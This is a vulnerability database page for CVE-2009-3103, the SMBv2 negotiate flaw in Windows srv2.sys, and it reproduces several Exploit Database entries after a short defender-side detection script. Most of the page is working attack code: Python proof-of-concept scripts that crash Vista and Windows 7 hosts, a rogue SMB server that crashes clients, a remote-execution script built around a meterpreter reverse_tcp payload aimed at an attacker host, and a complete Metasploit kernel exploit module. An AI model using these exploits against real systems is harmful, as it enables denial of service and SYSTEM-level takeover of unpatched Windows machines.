CVE-2009-3103: Details

97.04%V3
Network
2009-09-08 20:00 +00:00
2018-10-12 17:57 +00:00


Descriptions

Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location, aka "SMBv2 Negotiation Vulnerability." NOTE: some of these details are obtained from third party information.
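A defender-side check for the header field this description names, as an added example that is not part of the CVE record or of any exploit listed on this page: it parses the SMB1 header of a captured session message on TCP 445 and flags a NEGOTIATE request whose Process ID High is non-zero. Treating every non-zero value as suspicious is an assumption; `inspect_message`, `parse_dialects` and `sample_negotiate` are hypothetical names, and the sample messages are constructed.

```python
import struct

SMB1_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72
# Fields after the 4-byte magic: Command, Status, Flags, Flags2, PIDHigh,
# SecurityFeatures, Reserved, TID, PIDLow, UID, MID (little-endian, 28 bytes).
HEADER = struct.Struct("<BIBHH8sHHHHH")


def parse_dialects(body):
    """Parse a negotiate body: WordCount, ByteCount, then 0x02-prefixed C strings."""
    if len(body) < 3:
        return []
    byte_count = struct.unpack_from("<H", body, 1)[0]
    blob = body[3:3 + byte_count]
    return [item[1:].decode("ascii", "replace")
            for item in blob.split(b"\x00") if item.startswith(b"\x02")]


def inspect_message(message):
    """Classify one session message; return None when it is not SMB1."""
    if len(message) < 4 + 32 or message[0] != 0x00:
        return None
    smb = message[4:]  # the declared length is attacker-controlled, so ignore it
    if smb[:4] != SMB1_MAGIC:
        return None
    command, _status, _flags, _flags2, pid_high, *_rest = HEADER.unpack_from(smb, 4)
    dialects = parse_dialects(smb[32:]) if command == SMB_COM_NEGOTIATE else []
    return {
        "command": command,
        "pid_high": pid_high,
        "dialects": dialects,
        "offers_smb2": any(d.startswith("SMB 2") for d in dialects),
        # Assumption: a legitimate negotiate request leaves PIDHigh at zero.
        "suspicious": command == SMB_COM_NEGOTIATE and pid_high != 0,
    }


def sample_negotiate(pid_high, dialects):
    """Constructed test fixture: bytes of an SMB1 negotiate request."""
    body = b"".join(b"\x02" + d.encode("ascii") + b"\x00" for d in dialects)
    header = SMB1_MAGIC + HEADER.pack(SMB_COM_NEGOTIATE, 0, 0x18, 0xC853, pid_high,
                                      b"\x00" * 8, 0, 0xFFFF, 0xFEFF, 0, 0)
    smb = header + b"\x00" + struct.pack("<H", len(body)) + body
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


if __name__ == "__main__":
    for pid_high in (0x0000, 0x2600):
        print(inspect_message(sample_negotiate(pid_high, ["NT LM 0.12", "SMB 2.002"])))
```

The same field test can be expressed as a network IDS rule; the parser form is shown because it also reports which dialects the client offered.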

Information

Related weaknesses

CWE-ID Weakness name Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Metrics

Metric Score Severity CVSS Vector Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the probability that a vulnerability will be exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. The percentile therefore serves to compare the EPSS score of one CVE against that of other CVEs.

Exploit Information

Exploit Database EDB-ID : 12524

Publication date : 2010-05-06 22:00 +00:00
Author : Jelmer de Hen
EDB Verified : Yes

#!/usr/bin/python
# === EDIT – this exploit appears to be exactly the same one of one which was already found
# and fixed notified by Laurent Gaffié, i did not know this but his blog post can be found here:
# http://g-laurent.blogspot.com/2009/11/windows-7-server-2008r2-remote-kernel.html

import socket,sys,time

print "Maliformed negotiate protocol response and quickly closing the connection causes Windows machines supporting SMB2 to crash (leaves the system hanging and unresponsive) -- tested on Win 7 build 2600"
print "Written by Jelmer de Hen"
print "Published at http://h.ackack.net/?p=387"

smb = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
smb.bind(("", 445))
smb.listen(1)
smbconn, addr = smb.accept()
print "[+] "+str(addr)+" is trying to make connection to us over port 445"

while 1:
    new_packet = smbconn.recv(1024)
    print "[+] Waiting for a negotiate request packet"
    if new_packet[8]=="r":
        print "[+] Received the negotiate request packet injecting the 4 bytes now..."
        smbconn.send("\x00\x00\x00\x01")
        break

print "[+] Closing connection... This is part of the exploit"
smbconn.close()
print "[+] Done, if all went good then the box on the other side crashed"

Exploit Database EDB-ID : 10005

Publication date : 2009-11-10 23:00 +00:00
Author : laurent gaffie
EDB Verified : Yes

#!/usr/bin/python
# win7-crash.py:
# Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
# Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an
#infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash
#Author: Laurent Gaffié

import SocketServer

packet = ("\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a")

class SMB2(SocketServer.BaseRequestHandler):

    def handle(self):
        print "Who:", self.client_address
        print "THANKS SDL"
        input = self.request.recv(1024)
        self.request.send(packet)
        self.request.close()

launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445
launch.serve_forever()

Exploit Database EDB-ID : 9594

Publication date : 2009-09-08 22:00 +00:00
Author : laurent gaffie
EDB Verified : Yes

=============================================
- Release date: September 7th, 2009
- Discovered by: Laurent Gaffié
- Severity: High
=============================================

I. VULNERABILITY
-------------------------
Windows Vista, Server 2008 < R2, 7 RC :
SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

II. BACKGROUND
-------------------------
Windows Vista and newer Windows come with a new SMB version named SMB2.
See: http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
for more details.

III. DESCRIPTION
-------------------------
[Edit] Unfortunately this SMB2 security issue is specifically due to a MS patch, for another SMB2.0 security issue:
KB942624 (MS07-063)
Installing only this specific update on Vista SP0 creates the following issue:

SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client sends to a SMB server, and it's used
to identify the SMB dialect that will be used for further communication.

IV. PROOF OF CONCEPT
-------------------------

Smb-Bsod.py:

#!/usr/bin/python
#When SMB2.0 receives a "&" char in the "Process Id High" SMB header field
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error

from socket import socket

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negotiate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

V. BUSINESS IMPACT
-------------------------
An attacker can remotely crash any Vista/Windows 7 machine with SMB enabled.
Windows XP, 2k, are NOT affected as they don't have this driver.

VI. SYSTEMS AFFECTED
-------------------------
[Edit] Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008 < R2, Windows 7 RC.

VII. SOLUTION
-------------------------
No patch available for the moment.
Close SMB feature and ports, until a patch is provided.
Configure your firewall properly.
You can also follow the MS Workaround:
http://www.microsoft.com/technet/security/advisory/975497.mspx

VIII. REFERENCES
-------------------------
http://www.microsoft.com/technet/security/advisory/975497.mspx
http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx

IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com

X. REVISION HISTORY
-------------------------
September 7th, 2009: Initial release
September 11th, 2009: Revision 1.0 release

XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

XII. Personal Notes
-------------------------
Many persons have suggested to update this advisory for RCE and not BSOD:
It won't be done, if they find a way to execute code, they will publish their advisory.

# milw0rm.com [2009-09-09]

Exploit Database EDB-ID : 40280

Publication date : 2016-02-25 23:00 +00:00
Author : ohnozzy
EDB Verified : No

# EDB-Note: Source ~ https://raw.githubusercontent.com/ohnozzy/Exploit/master/MS09_050.py

#!/usr/bin/python
#This module depends on the linux command line program smbclient.
#I can't find a python smb library for smb login. If you can find one, you can replace that part of the code with the smb login function in python.
#The idea is that after the evil payload is injected by the first packet, it need to be trigger by an authentication event. Whether the authentication successes or not does not matter.
import tempfile
import sys
import subprocess
from socket import socket
from time import sleep
from smb.SMBConnection import SMBConnection

try:
    target = sys.argv[1]
except IndexError:
    print '\nUsage: %s <target ip>\n' % sys.argv[0]
    print 'Example: MS36299.py 192.168.1.1 1\n'
    sys.exit(-1)

#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.30.77 LPORT=443 EXITFUNC=thread -f python
shell = ""  # payload bytes omitted

host = target, 445

#stager_sysenter_hook from metasploit
buff = ""  # negotiate packet and stager bytes omitted
buff+=shell

s = socket()
s.connect(host)
s.send(buff)
s.close()
#Trigger the above injected code via authenticated process.
subprocess.call("echo '1223456' | rpcclient -U Administrator %s"%(target), shell=True)

Exploit Database EDB-ID : 14674

Publication date : 2010-08-16 22:00 +00:00
Author : Piotr Bania
EDB Verified : No

Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
---------------------------------------------------------------------

Exploited by Piotr Bania // www.piotrbania.com
Exploit for Vista SP2/SP1 only, should be reliable!

Tested on:
Vista sp2 (6.0.6002.18005)
Vista sp1 ultimate (6.0.6001.18000)

Kudos for:
Stephen, HDM, Laurent Gaffie(bug) and all the mates I know, peace.
Special kudos for prdelka for testing this shit and all the hosters.

Sample usage
------------

> smb2_exploit.exe 192.167.0.5 45 0
> telnet 192.167.0.5 28876

Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>

When all is done it should spawn a port TARGET_IP:28876

RELEASE UPDATE 08/2010:
----------------------
This exploit was created almost a year ago and wasn't modified from that time
whatsoever. The vulnerability itself is patched for a long time already so
I have decided to release this little exploit. You use it for your own
responsibility and I'm not responsible for any potential damage this thing
can cause. Finally I don't care whether it worked for you or not.

P.S. the technique itself is described here:
http://blog.metasploit.com/2009/10/smb2-351-packets-from-trampoline.html

===========================================================================

Download:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14674.zip (smb2_exploit_release.zip)

Exploit Database EDB-ID : 16363

Publication date : 2010-07-02 22:00 +00:00
Author : Metasploit
EDB Verified : Yes

##
# $Id: ms09_050_smb2_negotiate_func_index.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::SMB
  include Msf::Exploit::KernelMode

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference',
      'Description'    => %q{
          This module exploits an out of bounds function table dereference in the SMB
        request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7
        release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista
        without SP1 does not seem affected by this flaw.
      },
      'Author'         => [ 'laurent.gaffie[at]gmail.com', 'hdm', 'sf' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 9669 $',
      'References'     =>
        [
          [ 'MSB', 'MS09-050' ],
          [ 'CVE', '2009-3103' ],
          [ 'BID', '36299' ],
          [ 'OSVDB', '57799' ],
          [ 'URL', 'http://seclists.org/fulldisclosure/2009/Sep/0039.html' ],
          [ 'URL', 'http://www.microsoft.com/technet/security/Bulletin/MS09-050.mspx' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'           => 1024,
          'StackAdjustment' => -3500,
          'DisableNops'     => true,
          'EncoderType'     => Msf::Encoder::Type::Raw,
          'ExtendedOptions' =>
            {
              'Stager' => 'stager_sysenter_hook',
            }
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows Vista SP1/SP2 and Server 2008 (x86)',
            {
              'Platform'      => 'win',
              'Arch'          => [ ARCH_X86 ],
              'Ret'           => 0xFFD00D09, # "POP ESI; RET" from the kernels HAL memory region ...no ASLR :)
              'ReadAddress'   => 0xFFDF0D04, # A readable address from kernel space (no nulls in address).
              'ProcessIDHigh' => 0x0217,     # srv2!SrvSnapShotScavengerTimer
              'MagicIndex'    => 0x3FFFFFB4, # (DWORD)( MagicIndex*4 + 0x130 ) == 0
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Sep 07 2009'
    ))

    register_options(
      [
        Opt::RPORT(445),
        OptInt.new( 'WAIT', [ true, "The number of seconds to wait for the attack to complete.", 180 ] )
      ], self.class)
  end

  # Not reliable enough for automation yet
  def autofilter
    false
  end

  def exploit
    print_status( "Connecting to the target (#{datastore['RHOST']}:#{datastore['RPORT']})..." )
    connect

    # we use ReadAddress to avoid problems in srv2!SrvProcCompleteRequest
    # and srv2!SrvProcPartialCompleteCompoundedRequest
    dialects = [ [ target['ReadAddress'] ].pack("V") * 25, "SMB 2.002" ]

    data  = dialects.collect { |dialect| "\x02" + dialect + "\x00" }.join('')
    data += [ 0x00000000 ].pack("V") * 37 # Must be NULL's
    data += [ 0xFFFFFFFF ].pack("V")      # Used in srv2!SrvConsumeDataAndComplete2+0x34 (known stability issue with srv2!SrvConsumeDataAndComplete2+6b)
    data += [ 0xFFFFFFFF ].pack("V")      # Used in srv2!SrvConsumeDataAndComplete2+0x34
    data += [ 0x42424242 ].pack("V") * 7  # Unused
    data += [ target['MagicIndex'] ].pack("V") # An index to force an increment the SMB header value :) (srv2!SrvConsumeDataAndComplete2+0x7E)
    data += [ 0x41414141 ].pack("V") * 6  # Unused
    data += [ target.ret ].pack("V")      # EIP Control thanks to srv2!SrvProcCompleteRequest+0xD2
    data += payload.encoded               # Our ring0 -> ring3 shellcode

    # We gain code execution by returning into the SMB packet, beginning with its header.
    # The SMB packets Magic Header value is 0xFF534D42 which assembles to "CALL DWORD PTR [EBX+0x4D]; INC EDX"
    # This will cause an access violation if executed as we can never set EBX to a valid pointer.
    # To overcome this we force an increment of the header value (via MagicIndex), transforming it to 0x00544D42.
    # This assembles to "ADD BYTE PTR [EBP+ECX*2+0x42], DL" which is fine as ECX will be zero and EBP is a valid pointer.
    # We patch the Signature1 value to be a jump forward into our shellcode.
    packet = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct
    packet['Payload']['SMB'].v['Command']       = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE
    packet['Payload']['SMB'].v['Flags1']        = 0x18
    packet['Payload']['SMB'].v['Flags2']        = 0xC853
    packet['Payload']['SMB'].v['ProcessIDHigh'] = target['ProcessIDHigh']
    packet['Payload']['SMB'].v['Signature1']    = 0x0158E900 # "JMP DWORD 0x15D" ; jump into our ring0 payload.
    packet['Payload']['SMB'].v['Signature2']    = 0x00000000 # ...
    packet['Payload']['SMB'].v['MultiplexID']   = rand( 0x10000 )
    packet['Payload'].v['Payload']              = data

    packet = packet.to_s

    print_status( "Sending the exploit packet (#{packet.length} bytes)..." )
    sock.put( packet )

    wtime = datastore['WAIT'].to_i
    print_status( "Waiting up to #{wtime} second#{wtime == 1 ? '' : 's'} for exploit to trigger..." )
    stime = Time.now.to_i

    poke_logins = %W{Guest Administrator}
    poke_logins.each do |login|
      begin
        sec = connect(false)
        sec.login(datastore['SMBName'], login, rand_text_alpha(rand(8)+1), rand_text_alpha(rand(8)+1))
      rescue ::Exception => e
        sec.socket.close
      end
    end

    while( stime + wtime > Time.now.to_i )
      select(nil, nil, nil, 0.25)
      break if session_created?
    end

    handler
    disconnect
  end

end

Products Mentioned

Configuration 0

Microsoft>>Windows_server_2008 >> Version *

Microsoft>>Windows_server_2008 >> Version *

Microsoft>>Windows_server_2008 >> Version *

Microsoft>>Windows_server_2008 >> Version *

Microsoft>>Windows_server_2008 >> Version *

Microsoft>>Windows_server_2008 >> Version sp2

Microsoft>>Windows_server_2008 >> Version sp2

Microsoft>>Windows_vista >> Version *

Microsoft>>Windows_vista >> Version *

Microsoft>>Windows_vista >> Version *

References

http://www.securityfocus.com/bid/36299
Tags : vdb-entry, x_refsource_BID
http://www.kb.cert.org/vuls/id/135940
Tags : third-party-advisory, x_refsource_CERT-VN
http://blog.48bits.com/?p=510
Tags : x_refsource_MISC
http://www.us-cert.gov/cas/techalerts/TA09-286A.html
Tags : third-party-advisory, x_refsource_CERT
http://secunia.com/advisories/36623
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securitytracker.com/id?1022848
Tags : vdb-entry, x_refsource_SECTRACK
http://www.exploit-db.com/exploits/9594
Tags : exploit, x_refsource_EXPLOIT-DB
http://osvdb.org/57799
Tags : vdb-entry, x_refsource_OSVDB